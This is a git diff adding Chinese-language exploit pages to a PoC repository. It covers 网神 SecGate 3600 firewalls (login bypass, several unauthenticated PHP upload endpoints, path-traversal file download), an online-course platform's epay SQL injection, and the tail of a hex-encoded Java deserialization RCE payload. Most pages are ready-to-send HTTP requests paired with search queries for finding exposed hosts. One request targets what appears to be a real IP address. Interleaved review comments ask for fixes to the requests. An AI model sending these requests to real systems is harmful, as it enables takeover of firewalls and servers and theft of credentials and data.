4c6e4e77636d6c755a325a795957316c64323979617935335a5749755932397564475634644335795a5846315a584e304c6c4e6c636e5a735a585
2535a5846315a584e3051585230636d6c696458526c637745414332646c64464a6c63334276626e4e6c4151414b5a325630556d56786457567a6441454148577068646d46344c6e4e6c636e5a735a58517555325679646d786c64464a6c63334276626e4e6c4151414a5a32563056334a706447567944414369414a34424143567159585a686543357a5a584a32624756304c6d6830644841755348523063464e6c636e5a735a5852535a5846315a584e304151414a5a325630534756685a47567941514151616d4632595339735957356e4c314e30636d6c755a7777416f77436b415141445932316b444142454145554d414b5541706745414233427961573530624734424141566d6248567a6141454142574e7362334e6c415141414441436e414b674241416476637935755957316c42774370444143714145554d414b734172417741725143734151414464326c7544414375414b3842414152776157356e415141434c5734424142647159585a684c327868626d6376553352796157356e516e56706247526c636777417341437841514146494331754944514d414c4941724145414169396a41514146494331304944514241414a7a614145414169316a4277437a44414330414c554d414551417467454145577068646d4576645852706243395459324675626d56794277435344414333414c674d4144344175514541416c786844414336414c734d414c774176517741766743734441432f414c674d414d41415077454145327068646d4576624746755a79394665474e6c63485270623234424142426a623231745957356b494735766443427564577873444142434144384241414e54525445424142467159585a684c327868626d637655484a765932567a637745414531744d616d4632595339735957356e4c314e30636d6c755a7a734241424e7159585a684c327868626d63765647687962336468596d786c41514151616d4632595339735957356e4c31526f636d56685a41454144574e31636e4a6c626e525561484a6c595751424142516f4b55787159585a684c327868626d6376564768795a57466b4f7745414657646c64454e76626e526c654852446247467a633078765957526c636745414753677054477068646d4576624746755a7939446247467a633078765957526c636a73424142567159585a684c327868626d63765132786863334e4d6232466b5a58494241416c736232466b5132786863334d424143556f54477068646d4576624746755a79395464484a70626d63374b55787159585a684c327868626d63765132786863334d374151414a5a325630545756306147396b415142414b45787159585a684c327868626d6376553352796157356e4f317
44d616d4632595339735957356e4c304e7359584e7a4f796c4d616d4632595339735957356e4c334a6c5a6d786c59335176545756306147396b4f77454147477068646d4576624746755a7939795a575a735a574e304c30316c644768765a414541426d6c75646d39725a5145414f53684d616d4632595339735957356e4c303969616d566a6444746254477068646d4576624746755a793950596d706c593351374b55787159585a684c327868626d637654324a715a574e304f7745414557646c6445526c59327868636d566b545756306147396b4151414e6332563051574e6a5a584e7a61574a735a514541424368614b5659424141686e5a5852446247467a637745414579677054477068646d4576624746755a7939446247467a637a734241415a6c6358566862484d424142556f54477068646d4576624746755a793950596d706c593351374b566f424142427159585a684c327868626d637655336c7a644756744151414c5a32563055484a766347567964486b424141743062307876643256795132467a5a5145414643677054477068646d4576624746755a79395464484a70626d63374151414564484a706251454143474e76626e52686157357a415141624b45787159585a684c327868626d637651326868636c4e6c6358566c626d4e6c4f796c6141514147595842775a57356b415141744b45787159585a684c327868626d6376553352796157356e4f796c4d616d4632595339735957356e4c314e30636d6c755a304a316157786b5a584937415141496447395464484a70626d63424142467159585a684c327868626d6376556e567564476c745a514541436d646c64464a31626e5270625755424142556f4b55787159585a684c327868626d6376556e567564476c745a5473424143676f5730787159585a684c327868626d6376553352796157356e4f796c4d616d4632595339735957356e4c31427962324e6c63334d374151414f5a325630535735776458525464484a6c595730424142636f4b55787159585a684c326c764c306c7563485630553352795a5746744f7745414743684d616d4632595339706279394a626e423164464e30636d566862547370566745414448567a5a55526c62476c746158526c636745414a79684d616d4632595339735957356e4c314e30636d6c755a7a737054477068646d4576645852706243395459324675626d56794f774541423268686330356c6548514241414d6f4b566f42414152755a5868304151414f5a32563052584a7962334a5464484a6c595730424141646b5a584e30636d3935414345415051414a4141414141414145414145415067412f41414541514141414142304141514142414141414253713341414
77841414141415142424141414142674142414141414541414a41454941507741434145414141414679414159414377414141524b3441414b3241414d53424c594142557371456759447651414874674149544373424137304143625941436b323441414b3241414d53433759414255737145677744765141487467414954436f5344514f39414165324141684f4b7977447651414a7467414b4f6751744c414f3941416d3241416f3642626741417259414178494f746741464567384476514148746741514f67613441414b3241414d534562594142524953424c304142316b4445684e54746741514f67635a427753324142515a426753324142515a42686b454137304143625941436a6f494751635a4251533941416c5a417849565537594143734141457a6f4a47516d344142593643686b4974674158456867457651414857514d5345314f324142415a4341533941416c5a41786b4b55375941436c635a434c59414678495a413730414237594145426b494137304143625941436c635a434c594146784961413730414237594145426b494137304143625941436c657841414141415142424141414154674154414141414577414d41425141467741564143454146674174414263414f41415941454d414751424f41426f4157514162414738414841434b414230416b414165414a59414877436a4143414175414168414c38414967446841434d412b51416b415245414a514244414141414241414241446b41435142454145554141514241414141436e41414541416741414145324b7359424d6849624b725941484a6f424b5249647541416574674166544371324143424c41553042546973534962594149706b4150796f534937594149706b4149436f534a4c594149706f41463773414a566d33414359717467416e456969324143653241436c4c4272304145316b4445685654575151534b6c4e5a425370545471634150436f534937594149706b4149436f534a4c594149706f41463773414a566d33414359717467416e456975324143653241436c4c4272304145316b4445697854575151534c564e5a42537054547267414c6932324143394e757741775753793241444733414449534d3759414e446f45475153324144575a4141735a424c59414e716341425249624f6757374144425a4c4c59414e3763414d68497a746741304f6753374143565a7477416d475157324143635a424c59414e5a6b4143786b457467413270774146456875324143653241436b3642526b464f675973786741484c4c59414f426b4773446f454751533241446f3642537a474141637374674134475157774f676373786741484c4c59414f426b487678493773414145414a304242774
55341446b416e5145484153594141414553415273424a674141415359424b41456d41414141416742424141414165674165414141414b41414e41436b4146674171414273414b7741644143774148774174414367414c6741364143384154674178414751414d7742324144514169674132414a30414f51436c41446f4174774137414d734150414464414430424177412b415163415167454c41454d424477412b41524941507745554145414247774243415238415177456a414541424a6742434153774151774577414555424d77424841455941414143304141372b41453448414563484145674841456b564a524c3841436b4841457042427742482f7741764141594841456348414563484145674841456b4841456f484145634141516341532f3841415141474277424842774248427742494277424a4277424b4277424841414948414573484145663841424d484145662f4141494142416341527763415277634153416341535141424277424d2f5141514277424d427742482f7741434141514841456348414563484145674841456b414151634154663841435141494277424842774248427742494277424a414141414277424e4141442f414149414151634152774141414167415467412f4141454151414141414430414151414241414141434c6741504b6341424575784141454141414144414159414f514143414545414141414f41414d414141414d41414d4144514148414134415267414141416341416b59484145774141414541547741414141494155413d3d223b0a636c7a203d20646566696e65436c617373286261736536344465636f6465546f4279746528636f646529293b0a636c7a2e6e6577496e7374616e636528293b7400046576616c7571007e001b0000000171007e0023737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f4000000000000077080000001000000000787878;" + } +} +``` + +![image-20241227221404049](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272214131.png) \ No newline at end of file diff --git a/网神SecGata3600安全网关authManageSet.cgi接口登录绕过漏洞.md b/网神SecGata3600安全网关authManageSet.cgi接口登录绕过漏洞.md new file mode 100644 index 0000000..267b626 --- /dev/null +++ b/网神SecGata3600安全网关authManageSet.cgi接口登录绕过漏洞.md 
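Review bot: the `userOverridesAsString` value in 网神SecFox运维安全管理与审计系统FastJson反序列化RCE漏洞.md is an opaque multi-kilobyte hex blob that the page neither explains nor tells the reader how to regenerate, so nobody can audit what it does before sending it to a target; document it. Decoding the visible bytes, it is a Java serialized stream (`aced0005` followed by `java.util.HashSet`, `org.apache.commons.collections.keyvalue.TiedMapEntry`, `LazyMap`, `ChainedTransformer`, `InvokerTransformer` and `javax.script.ScriptEngineManager` with `getEngineByName`, `js` and `eval`) whose script calls `defineClass` on an embedded base64 class and then `newInstance()`, i.e. a commons-collections chain reached through the c3p0 `WrapperConnectionPoolDataSource` gadget after the `java.lang.Class`/`val` autotype pre-load trick; say so, name the generator, give the fastjson version that is claimed vulnerable, and explain that the command is supplied in the `Cmd: id` request header (the only place a command appears) and where its output is returned. The request template also has an empty `Host:`, a truncated `Referer: https://`, no `Content-Length`, and a `javascript` fence tag on an HTTP request.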
@@ -0,0 +1,31 @@ +# 网神SecGata 3600安全网关authManageSet.cgi 接口登录绕过漏洞 + +# 一、漏洞简介 +SecGate3600是网神信息技术(北京)股份有限公司旗下一款安全网关产品,网神 SecGate3600 存在登录绕过漏洞,攻击者利用该漏洞可获取管理员密码等敏感信息,进一步控制系统。 + +# 二、漏洞简介 ++ 网神SecGata 3600-A1500 + +# 三、资产测绘 ++ hunter`web.body="sec_gate_image/login_02.gif"` ++ 特征 + +![1702017961550-3103e894-3910-4147-8286-4abade065d93.png](./img/ASmvAfvQqr_SQdi2/1702017961550-3103e894-3910-4147-8286-4abade065d93-247789.png) + +# 四、漏洞复现 +```java +POST /cgi-bin/authUser/authManageSet.cgi HTTP/1.1 +Host: {hostname} +Content-Type: application/x-www-form-urlencoded +Cookie: sw_login_name=admin +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 + +type=getAllUsers&_search=false&nd=1645000391264&rows=-1&page=1&sidx=&sord=asc +``` + +![1702017993631-08fad56b-a74c-498f-82ef-a9ea5bdda175.png](./img/ASmvAfvQqr_SQdi2/1702017993631-08fad56b-a74c-498f-82ef-a9ea5bdda175-354774.png) + + + +> 更新: 2024-02-29 23:57:15 +> 原文: \ No newline at end of file diff --git a/网神SecGata3600防火墙app_av_import_save任意文件上传漏洞.md b/网神SecGata3600防火墙app_av_import_save任意文件上传漏洞.md new file mode 100644 index 0000000..0c8f9a1 --- /dev/null +++ b/网神SecGata3600防火墙app_av_import_save任意文件上传漏洞.md 
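Review bot: in 网神SecGata3600安全网关authManageSet.cgi接口登录绕过漏洞.md the second section is headed `# 二、漏洞简介` although it lists the affected model (`网神SecGata 3600-A1500`); rename it 二、影响版本 like the other pages. The bypass itself should be named in the text: the only authentication material in the request is `Cookie: sw_login_name=admin`, and `type=getAllUsers&...&rows=-1` returns the full user list, which is what 获取管理员密码 refers to; say whether the password field comes back in plaintext or as a hash. `{hostname}` should be the `xx.xx.xx.xx` placeholder used elsewhere, the fence holding an HTTP request is tagged `java`, and `SecGata` in the filename and headings is a typo for `SecGate` (the body text itself writes SecGate3600) that recurs across the 网神 files.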
@@ -0,0 +1,57 @@ +# 网神SecGata 3600防火墙app_av_import_save任意文件上传漏洞 + +# 一、漏洞简介 +网神 SecGate 3600 防火墙 app_av_import_save接口存在任意文件上传漏洞,攻击者通过构造特殊请求包即可获取服务器权限。 + +# 二、影响版本 ++ 网神SecGata 3600防火墙 + +# 三、资产测绘 + - hunter:`app.name="网神 SecGate"&&web.title=="网神SecGate 3600防火墙"` + +![1691631315585-e71862e7-a889-460a-b2f7-a14e396c2f9b.png](./img/8IEiY_3wdr8DnXFC/1691631315585-e71862e7-a889-460a-b2f7-a14e396c2f9b-765098.png) + ++ 登录页面 + +![1691631344474-a4ef0b41-65a2-4221-8212-3ca32e0b0b40.png](./img/8IEiY_3wdr8DnXFC/1691631344474-a4ef0b41-65a2-4221-8212-3ca32e0b0b40-843416.png) + +# 四、漏洞复现 +```plain +POST / HTTP/1.1 +Host: {hostname} +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 +Connection: close +Content-Length: 451 +Accept-Encoding: gzip, deflate, br +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJpMyThWnAxbcBBQc + +------WebKitFormBoundaryJpMyThWnAxbcBBQc +Content-Disposition: form-data; name="MAX_FILE_SIZE" + +10000000 +------WebKitFormBoundaryJpMyThWnAxbcBBQc +Content-Disposition: form-data; name="reqfile";filename="nhzwe1.php" +Content-Type: text/plain + + +------WebKitFormBoundaryJpMyThWnAxbcBBQc +Content-Disposition: form-data; name="submit_post" + +app_av_import_save +------WebKitFormBoundaryJpMyThWnAxbcBBQc-- +``` + +![1702440125730-b79525ce-efcd-4d20-8d36-50bdd22ff370.png](./img/8IEiY_3wdr8DnXFC/1702440125730-b79525ce-efcd-4d20-8d36-50bdd22ff370-446268.png) + +上传文件位置 + +```plain +/attachements/nhzwe1.php +``` + +![1702440151735-9e4e75b0-e9eb-4901-aff7-a4d496418e49.png](./img/8IEiY_3wdr8DnXFC/1702440151735-9e4e75b0-e9eb-4901-aff7-a4d496418e49-573179.png) + + + +> 更新: 2024-02-29 23:57:16 +> 原文: \ No newline at end of file diff --git a/网神SecGata3600防火墙obj_app_upfile任意文件上传漏洞.md b/网神SecGata3600防火墙obj_app_upfile任意文件上传漏洞.md new file mode 100644 index 0000000..8f6007e --- /dev/null +++ b/网神SecGata3600防火墙obj_app_upfile任意文件上传漏洞.md 
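Review bot: the upload body in 网神SecGata3600防火墙app_av_import_save任意文件上传漏洞.md sends `reqfile` as `nhzwe1.php` with an empty file part, so the screenshot only proves that an arbitrary extension lands in `/attachements/`, not that it executes; put a harmless marker such as `<?php echo md5(1); ?>` in the part and show the response from `/attachements/nhzwe1.php`, or say explicitly that execution was not verified, and recompute `Content-Length: 451` once the part is non-empty. Unlike the sibling `obj_app_upfile` page, the request is `POST /` with the action carried only in the `submit_post=app_av_import_save` field; call that out so readers do not add a `?g=` parameter by analogy. `{hostname}` and the `plain` fence on an HTTP request should follow the page convention, and the one-line root cause from the `obj_app_upfile` page (no authentication on the handler, upload directory web-accessible) belongs in 漏洞简介 here too.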
@@ -0,0 +1,60 @@ +# 网神SecGata 3600防火墙obj_app_upfile任意文件上传漏洞 + +# 一、漏洞简介 +网神 SecGate 3600 防火墙 obj_app_upfile接口存在任意文件上传漏洞,攻击者通过构造特殊请求包即可获取服务器权限。 + +# 二、影响版本 ++ 网神SecGata 3600防火墙 + +# 三、资产测绘 ++ hunter:`app.name="网神 SecGate"&&web.title=="网神SecGate 3600防火墙"` + +![1691631315585-e71862e7-a889-460a-b2f7-a14e396c2f9b.png](./img/ubfuoBo-P4aj5Y9L/1691631315585-e71862e7-a889-460a-b2f7-a14e396c2f9b-743981.png) + ++ 登录页面 + +![1691631344474-a4ef0b41-65a2-4221-8212-3ca32e0b0b40.png](./img/ubfuoBo-P4aj5Y9L/1691631344474-a4ef0b41-65a2-4221-8212-3ca32e0b0b40-583233.png) + +# 四、漏洞复现 +没有对文件调用进行鉴权,且文件上传路径为可访问路径,造成任意文件上传 + +```java +POST /?g=obj_app_upfile HTTP/1.1 +Host: xx.xx.xx.xx +Accept: */* +Accept-Encoding: gzip, deflate +Content-Length: 569 +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJpMyThWnAxbcBBQc +User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0) + +------WebKitFormBoundaryJpMyThWnAxbcBBQc +Content-Disposition: form-data; name="MAX_FILE_SIZE" + +10000000 +------WebKitFormBoundaryJpMyThWnAxbcBBQc +Content-Disposition: form-data; name="upfile"; filename="test.php" +Content-Type: text/plain + + + +------WebKitFormBoundaryJpMyThWnAxbcBBQc +Content-Disposition: form-data; name="submit_post" + +obj_app_upfile +------WebKitFormBoundaryJpMyThWnAxbcBBQc +Content-Disposition: form-data; name="__hash__" + +0b9d6b1ab7479ab69d9f71b05e0e9445 +------WebKitFormBoundaryJpMyThWnAxbcBBQc-- +``` + +![1691631427460-499815cb-61ff-42a9-b08f-372c89bab99b.png](./img/ubfuoBo-P4aj5Y9L/1691631427460-499815cb-61ff-42a9-b08f-372c89bab99b-550913.png) + +默认上传路径 `/secgate/webui/attachements/` , 访问 `attachements/test.php` 文件 + +![1691631538330-1fdec676-1995-4b7d-84c5-8a5f3e05b79e.png](./img/ubfuoBo-P4aj5Y9L/1691631538330-1fdec676-1995-4b7d-84c5-8a5f3e05b79e-356178.png) + + + +> 更新: 2024-02-29 23:57:16 +> 原文: \ No newline at end of file 
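Review bot: the request in 网神SecGata3600防火墙obj_app_upfile任意文件上传漏洞.md includes a `__hash__` field with the fixed value `0b9d6b1ab7479ab69d9f71b05e0e9445` that is never explained; say whether it is a static value any client can send or is tied to a session or form, because it is the one field that could make this upload depend on state. The sentence 没有对文件调用进行鉴权,且文件上传路径为可访问路径 and the `/secgate/webui/attachements/` default path are the clearest root-cause facts in the batch and should be repeated on the `app_av_import_save`, `sec_ssl_agent_import_save` and `sys_hand_upfile` pages. The `test.php` part is empty again, so execution is not shown, and the fence is tagged `java` for an HTTP request.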
diff --git a/网神SecGata3600防火墙sec_ssl_agent_import_save任意文件上传漏洞.md b/网神SecGata3600防火墙sec_ssl_agent_import_save任意文件上传漏洞.md new file mode 100644 index 0000000..cec76b4 --- /dev/null +++ b/网神SecGata3600防火墙sec_ssl_agent_import_save任意文件上传漏洞.md 
@@ -0,0 +1,60 @@ +# 网神SecGata 3600防火墙sec_ssl_agent_import_save任意文件上传漏洞 + +# 一、漏洞简介 +网神 SecGate 3600 防火墙 sec_ssl_agent_import_save接口存在任意文件上传漏洞,攻击者通过构造特殊请求包即可获取服务器权限。 + +# 二、影响版本 ++ 网神SecGata 3600防火墙 + +# 三、资产测绘 + - hunter:`app.name="网神 SecGate"&&web.title=="网神SecGate 3600防火墙"` + +![1691631315585-e71862e7-a889-460a-b2f7-a14e396c2f9b.png](./img/-N6yTXZ-Xrvrv3lT/1691631315585-e71862e7-a889-460a-b2f7-a14e396c2f9b-064175.png) + ++ 登录页面 + +![1691631344474-a4ef0b41-65a2-4221-8212-3ca32e0b0b40.png](./img/-N6yTXZ-Xrvrv3lT/1691631344474-a4ef0b41-65a2-4221-8212-3ca32e0b0b40-887909.png) + +# 四、漏洞复现 +```plain +POST /?g=sec_ssl_agent_import_save HTTP/1.1 +Host: xx.xx.xx.xx +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 +Content-Length: 343 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Cache-Control: max-age=0 +Connection: close +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryEkSeIhsa5fnqB0Zn +Upgrade-Insecure-Requests: 1 +SL-CE-SUID: 1057 + + +------WebKitFormBoundaryEkSeIhsa5fnqB0Zn +Content-Disposition: form-data; name="reqfile"; filename="2.php" +Content-Type: text/plain + + + +------WebKitFormBoundaryEkSeIhsa5fnqB0Zn +Content-Disposition: form-data; name="submit_post" + +sec_ssl_agent_import_save +------WebKitFormBoundaryEkSeIhsa5fnqB0Zn-- +``` + +![1695735421920-d255f88c-764a-42ec-8149-17edf9f02cf3.png](./img/-N6yTXZ-Xrvrv3lT/1695735421920-d255f88c-764a-42ec-8149-17edf9f02cf3-656138.png) + +上传文件位置 + +```plain +/attachements/2.php +``` + +![1695735454815-44638c44-4f66-43cb-8f54-95d97029eea6.png](./img/-N6yTXZ-Xrvrv3lT/1695735454815-44638c44-4f66-43cb-8f54-95d97029eea6-002177.png) + + + +> 更新: 2024-02-29 23:57:16 +> 原文: \ No newline at end of file 
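Review bot: the request in 网神SecGata3600防火墙sec_ssl_agent_import_save任意文件上传漏洞.md carries an unexplained `SL-CE-SUID: 1057` header; either state that the handler requires it or remove it, since a reader copying the request cannot tell whether it matters. The `reqfile` part (`2.php`) has no content, so only the file landing at `/attachements/2.php` is shown, not execution; add a marker and recompute `Content-Length: 343`, and note the extra blank line between the end of the headers and the first boundary, which is counted in that length. 漏洞简介 is the generic sentence shared with the other upload pages; the one-line root cause from the `obj_app_upfile` page (no authentication on the handler, upload directory web-accessible) belongs here too.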
diff --git a/网神SecGata3600防火墙sys_hand_upfile任意文件上传漏洞.md b/网神SecGata3600防火墙sys_hand_upfile任意文件上传漏洞.md new file mode 100644 index 0000000..bf5c434 --- /dev/null +++ b/网神SecGata3600防火墙sys_hand_upfile任意文件上传漏洞.md @@ -0,0 +1,59 @@ +# 网神SecGata 3600防火墙sys_hand_upfile任意文件上传漏洞 + +# 一、漏洞简介 +网神 SecGate 3600 防火墙 sys_hand_upfile接口存在任意文件上传漏洞,攻击者通过构造特殊请求包即可获取服务器权限。 + +# 二、影响版本 ++ 网神SecGata 3600防火墙 + +# 三、资产测绘 + - hunter:`app.name="网神 SecGate"&&web.title=="网神SecGate 3600防火墙"` + +![1691631315585-e71862e7-a889-460a-b2f7-a14e396c2f9b.png](./img/W5YK0CmTgjGYZMx7/1691631315585-e71862e7-a889-460a-b2f7-a14e396c2f9b-558082.png) + ++ 登录页面 + +![1691631344474-a4ef0b41-65a2-4221-8212-3ca32e0b0b40.png](./img/W5YK0CmTgjGYZMx7/1691631344474-a4ef0b41-65a2-4221-8212-3ca32e0b0b40-349914.png) + +# 四、漏洞复现 +```plain +POST /?g=sys_hand_upfile HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows 98; Trident/3.0) +Content-Length: 261 +Accept: */* +Accept-Encoding: gzip, deflate +Connection: close +Content-Type: multipart/form-data; boundary=cmqfdwckb52z6zvzzjgm +Connection: close + +--cmqfdwckb52z6zvzzjgm +Content-Disposition: form-data; name="upfile"; filename="7litvvzvnk.php" + + +--cmqfdwckb52z6zvzzjgm +Content-Disposition: form-data; name="submit_post" + +sys_hand_upfile +--cmqfdwckb52z6zvzzjgm-- +``` + +![1706024999167-a34f561c-297b-47a9-a171-ec6bb308ca82.png](./img/W5YK0CmTgjGYZMx7/1706024999167-a34f561c-297b-47a9-a171-ec6bb308ca82-529354.png) + +上传文件位置 + +```plain +GET /attachements/7litvvzvnk.php HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows 98; Trident/3.0) +Connection: close +Cookie: __s_sessionid__=jvdi0lqirs2c3ilvut5t2qluv6 +Accept-Encoding: gzip, deflate +``` + +![1706025015329-f5902d0c-5062-41fc-96c5-2cbfe53ad317.png](./img/W5YK0CmTgjGYZMx7/1706025015329-f5902d0c-5062-41fc-96c5-2cbfe53ad317-870523.png) + + + +> 更新: 2024-02-29 23:57:16 +> 原文: \ No newline at end of file 
diff --git a/网神SecGata3600防火墙存在任意文件下载漏洞.md b/网神SecGata3600防火墙存在任意文件下载漏洞.md new file mode 100644 index 0000000..0ac3a63 --- /dev/null +++ b/网神SecGata3600防火墙存在任意文件下载漏洞.md @@ -0,0 +1,38 @@ +# 网神SecGata 3600防火墙存在任意文件下载漏洞 + +# 一、漏洞简介 +网神SecGata 3600防火墙存在任意文件下载漏洞 + +# 二、影响版本 ++ 网神SecGata 3600防火墙 + +# 三、资产测绘 ++ hunter`app.name="网神 SecGate"` ++ 特征 + +![1699025464055-779b228f-776a-4779-bd37-dc1169b22d30.png](./img/BZE6j-rjWFII193w/1699025464055-779b228f-776a-4779-bd37-dc1169b22d30-146282.png) + +# 四、漏洞复现 +```plain +GET /?g=sys_export_conf_local_save&file_name=../modules/system/import_export.mds HTTP/1.1 +Host: xx.xx.xx.xx +Cookie: __s_sessionid__=5543sd9rcbiklqs1ttignkqvt6 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: none +Sec-Fetch-User: ?1 +Te: trailers +Connection: close +``` + +![1699025619992-0db92bcd-d757-4eee-9ef5-2c1ca8153978.png](./img/BZE6j-rjWFII193w/1699025619992-0db92bcd-d757-4eee-9ef5-2c1ca8153978-977623.png) + + + +> 更新: 2024-02-29 23:57:16 +> 原文: \ No newline at end of file diff --git a/网神SecGate-3600-防火墙sys_hand_upfile-任意文件上传漏洞.md b/网神SecGate-3600-防火墙sys_hand_upfile-任意文件上传漏洞.md new file mode 100644 index 0000000..2b23a17 --- /dev/null +++ b/网神SecGate-3600-防火墙sys_hand_upfile-任意文件上传漏洞.md 
@@ -0,0 +1,36 @@ +## 网神SecGate 3600 防火墙sys_hand_upfile 任意文件上传漏洞 + + 网神 SecGate 3600 防火墙 sys_hand_upfile 存在任意文件上传漏洞,攻击者可构造特殊 HTTP 请求上传任意文件获取服务器权限,执行恶意命令等。 + + ## fofa + ``` +body="./images/lsec/login/loading.gif" +title="网神SecGate 3600防火墙" +``` + +## poc +``` +POST /?g=sys_hand_upfile HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows 98; Trident/3.0) +Content-Length: 244 +Accept: */* +Accept-Encoding: gzip, deflate, br +Connection: keep-alive +Content-Type: multipart/form-data; boundary=gttd4i4aadwh9lmlp1ez + +--gttd4i4aadwh9lmlp1ez +Content-Disposition: form-data; name="upfile"; filename="ceshi.php" + + +--gttd4i4aadwh9lmlp1ez +Content-Disposition: form-data; name="submit_post" + +sys_hand_upfile +--gttd4i4aadwh9lmlp1ez-- +``` + +![image](https://github.com/wy876/POC/assets/139549762/6ba66f9f-affd-4600-ac29-2cfe98502b45) + +访问文件路径 +http//127.0.0.1/attachements/ceshi.php diff --git a/网神防火墙-app_av_import_save文件上传漏洞.md b/网神防火墙-app_av_import_save文件上传漏洞.md new file mode 100644 index 0000000..314e952 --- /dev/null +++ b/网神防火墙-app_av_import_save文件上传漏洞.md 
@@ -0,0 +1,77 @@ + +## 网神防火墙 app_av_import_save文件上传漏洞 + +## fofa +``` +title="网神SecGate 3600防火墙" +``` + + +## exp +``` +POST +HTTP/1.1 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJpMyThWnAxbcBBQc +Cache-Control: no-cache +Pragma: no-cache +Host: 218.60.144.129 +Content-Length: 536 + +------WebKitFormBoundaryJpMyThWnAxbcBBQc +Content-Disposition: form-data; name="MAX_FILE_SIZE" + +10000000 +------WebKitFormBoundaryJpMyThWnAxbcBBQc +Content-Disposition: form-data; name="upfile"; filename="test.txt" +Content-Type: text/plain + +test111 +------WebKitFormBoundaryJpMyThWnAxbcBBQc +Content-Disposition: form-data; name="submit_post" + +obj_app_upfile +------WebKitFormBoundaryJpMyThWnAxbcBBQc +Content-Disposition: form-data; name="__hash__" + +0b9d6b1ab7479ab69d9f71b05e0e9445 +------WebKitFormBoundaryJpMyThWnAxbcBBQc-- +``` + +``` +POST /?g=obj_app_upfile HTTP/1.1 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJpMyThWnAxbcBBQc +Cache-Control: no-cache +Pragma: no-cache +Host: 218.60.144.129 +Content-Length: 536 + +------WebKitFormBoundaryJpMyThWnAxbcBBQc +Content-Disposition: form-data; name="MAX_FILE_SIZE" + +10000000 +------WebKitFormBoundaryJpMyThWnAxbcBBQc +Content-Disposition: form-data; name="upfile"; filename="test.txt" +Content-Type: text/plain + +test111 
+------WebKitFormBoundaryJpMyThWnAxbcBBQc +Content-Disposition: form-data; name="submit_post" + +obj_app_upfile +------WebKitFormBoundaryJpMyThWnAxbcBBQc +Content-Disposition: form-data; name="__hash__" + +0b9d6b1ab7479ab69d9f71b05e0e9445 +------WebKitFormBoundaryJpMyThWnAxbcBBQc-- +``` + +## 漏洞复现 +![](./assets/20231129204159.png) diff --git a/网课交单平台epay存在SQL注入漏洞.md b/网课交单平台epay存在SQL注入漏洞.md new file mode 100644 index 0000000..8d18f28 --- /dev/null +++ b/网课交单平台epay存在SQL注入漏洞.md 
@@ -0,0 +1,56 @@ +# 网课交单平台epay存在SQL注入漏洞 + +# 一、漏洞简介 +网课交单平台是一款和发卡网对接的网课代学平台,拥有聚合支付,论文编辑等功能,其后台的可用性及可靠性得到了使用者的认可。网课交单平台某接口存在SQL注入漏洞。攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。 + +# 二、影响版本 ++ 网课交单平台 + +# 三、资产测绘 +```http +"/apisub.php" +``` + +![1718193605379-22758e9d-9d5a-41a0-ba54-3cb86c6a26c9.png](./img/pSqHXnKzl_2lNnxt/1718193605379-22758e9d-9d5a-41a0-ba54-3cb86c6a26c9-427126.png) + +# 四、漏洞复现 +```java +POST /epay/epay.php HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate, br +Content-Type: application/x-www-form-urlencoded +Content-Length: 157 +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +Priority: u=1 + +out_trade_no=' UNION ALL SELECT 1,CONCAT(IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),3,4,5,6,7,8,9,10,11,12,13-- - +``` + 